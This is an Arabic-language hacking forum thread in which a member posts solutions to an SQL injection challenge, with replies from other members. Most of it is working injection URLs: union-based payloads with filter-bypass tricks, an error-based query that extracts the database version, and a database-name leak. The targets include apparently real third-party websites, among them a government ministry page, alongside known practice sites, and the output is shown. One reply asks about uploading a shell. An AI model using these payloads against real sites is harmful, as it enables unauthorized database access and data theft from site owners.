Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة



السلام عليكم ورحمة الله

كنت وضعت عدة مواقع كاتحدي للحقن بهذا الموضوع

كود PHP:
http://www.sec4ever.com/home/showthread.php?t=18724 
فإليكم الحل بصورة سريعه لضيق الوقت لدي


الموقع الأول

عدد الأعمده عشرة

كود:
sinnenashus.se/?id=5 union select 1,2,3,4,5,6,7,8,9,10

لكن ظهر الخطأ

كود:
Fatal error: Maximum execution time of 30 seconds exceeded

لذا الحل سوف يكون التالي والمناسب لتخطي هذا الخطأ

إسم التقنية

تقنية التحكم في التدفق الـ Flow Control

كود:
هذه التقنية من إختراعي ليست لأحد في الدنيا غيري



لنقوم أولا بالتقديم لهذه التقنيه

التقنية الرئيسية

المطلوب لتنفيذ التقنية

هي للمواقع التي تٌعاني فقد في قيم الأعمدة

مثال كٌلي على تركيب التقنية



كود:
www.InjectorBoy.md/news.php?id=.58||!{f`id`}union-- a%[email protected],2,3,4-- -




شرح أٌلأٌسلوب التركيبي



[1] || means "or" .
[2] ! means not() .
[3] {f} means timestamp .
[4] `id` is the column .
[5] --%0a means comment and new line .
[6] the @ after is just to stick a char to select, @ is a temporary variable .


بالعربيه


[1]

|| تعني "أو" .


[2]

! تعني لا() .


[3]

{f} تعني الطابع الزمني .


[4]

`id` تعني العمود .


[5]

--%0a تعني تعليق و سطر جديد .


[6]

الـ @ بعد الـ select هي مٌجرد مٌتغير مؤقت ويحذف الرقم الأول للأعمدة ويٌستبدل بالـ @ .


وهذه التقنية لا تصلٌح لكافة قواعد البيانات بمعنى إنها لا تعمل إلا مع المواقع التي تٌعاني فقد في قيم الأعمدة والتي تحتاج لتعريفهٌ عند كتابة الإستغلال العام الكٌلي -


كود:
http://testphp.vulnweb.com/listproducts.php?cat=.1||!{f`id`}union-- a%[email protected],2,3,4,5,6,7,8,9,10,11-- -







بالنسبه لموقعنا الفقد هنا فقد جٌزئي في المتغير
لذا كٌل ما علينا هو تعويض هذا الفقد عن طريق إضافة قيمة تعويضيه حرفيه للمٌتغير مٌستخدمين تقنية التحكم في التدفق الـ Flow Control على النحو التالي

كود:
sinnenashus.se/?id={f -5} union select 1,2,3,4,5,6,7,8,9,10




إنتهي الشرح


الموقع الثاني

إظهار إسم قاعدة البيانات

الحل


كود PHP:
www.gov.ai/ministry.php?id=_() 
الناتج

FUNCTION govai_website_main._ does not exist


الموقع الثالث والأخير

كود PHP:
                       http://leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1 
عند وضع اشارة الكومة للتاكد من إصابة الموقع

كود PHP:
 http://leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1 ' 
ظهر الخطأ التالي

Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQLserver version for the right syntax to use near ''1 ''))a limit 1' at line 1

لنتعلم شئ معا ان دائما الحل يظهر فى الخطأ عبارة عن تنبيه من قاعدة البيانات


كود PHP:
leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1'))a UNION ((select 1 from(select count(*),concat(version(),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x))-- - 
Error While Selection process : Duplicate entry '5.6.35-cll-lve:1' for key 'group_key'

تم تخطي المشكله بعملية الاغلاق على المتغير وإستخدام الإيرورباسيد يونيون سليكت للحقن


تحياتى للجميع


توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





20 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
Rover عضو مميز
  • شكراً: 1903
  • تم شكره 235 مرة في 69 مشاركة

تحدي جميل

لكن في الموقع الاول جرب

sinnenashus.se/?id=`false union select 1,2,3,4,5,6,7,8,9,10-- -
ولاحظ الخطأ الظاهر
هل في احتمال انو في امكانيه اكمال الحقن union based

توقيع
سبحان الله وبحمده سبحان الله العظيم
..............
They will learn the lesson in a hard expensive way

BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة

المشاركة الأصلية كتبت بواسطة Hiker اقتباس :
تحدي جميل

لكن في الموقع الاول جرب


ولاحظ الخطأ الظاهر
هل في احتمال انو في امكانيه اكمال الحقن union based
لا عزيزي لايمكن بأي طريقة من الطرق حقنه باليونيون باسيد لان الخطأ الناتج فى الاساس

كود PHP:
The used SELECT statements have a different number of columns 
لذا الحقن error based

ملحوظة : لقد تمكنت من تخطي هذا الخطاء والحقن يونيون باسيد عادي فى بعض المرات بإستخدام التقنيتين الثانية والثالثه بالموضوع المشروح هنا

كود PHP:
http://www.sec4ever.com/home/showthread.php?t=18731 
ولكني لم أٌجرب ذلك


وشرحت ذلك فى كتابي 2016


اليك مثال


كود PHP:
www.onlinepost.in/show.php?page=-39+DiV+0+/*!00000UnIoN*/ SeLeCt 1,2,3,4,5,6,7,8,9,10,11 -- - 

Database query failed: The used SELECT statements have a different number of columns

هذا الموقع يمكن حقنه مع هذا الخطاء بأٌسلوب يسمى

routed query injection

سوف يشرح فى الدرس القادم إن شاء الله وموجود بكتبى ايضا

تحياتى

توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





2 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
PHILOPS عضو نشيط
  • شكراً: 47
  • تم شكره 74 مرة في 36 مشاركة

جيد، في ثغرات xpath هل يمكنني رفع shell ؟

BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة

المشاركة الأصلية كتبت بواسطة philops اقتباس :
جيد، في ثغرات xpath هل يمكنني رفع shell ؟
.تقصد عن طريق الحقن مباشرة

إن كنت تقصد ذلك فليس لي علم بذلك لان كل الثغرات التي تستدعى ملفات من الخارج ضمن الحقن تم ترقيعها

توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5577 مرة في 1384 مشاركة

للإشارة انك حصرت الحقن على union based بينما الحل في الموقع الثاني والثالث بطريقة اخرى.

2 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة

المشاركة الأصلية كتبت بواسطة UzunDz اقتباس :
للإشارة انك حصرت الحقن على union based بينما الحل في الموقع الثاني والثالث بطريقة اخرى.
أهلا بيك عزيزي تقصد ذلك


نوع الحقن المطلوب : union based

لمن ليس لهٌ دراية هذا معناه أن الحقن سوف يكون بإستخدام الـ union select فقط لا غير


هذا منوط فقط بالموقع الاول ولم أذكرة في كلى الموقعين الاخرين أظنك عزيزي فهمت الامر بهذه الصورة المٌغايرة لما اطلب

توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





2 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
aircrack -ng :: عضو خاص ::
  • شكراً: 745
  • تم شكره 1754 مرة في 208 مشاركة

المشاركة الأصلية كتبت بواسطة UzunDz اقتباس :
للإشارة انك حصرت الحقن على union based بينما الحل في الموقع الثاني والثالث بطريقة اخرى.
علي نعرفك حبيب اللغة هاذي
ارا السكايب الجديد

توقيع
يامن بدنياه انشغل وغره طول الامل الموت يأتي بغتة والقبر صندوق العمل
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever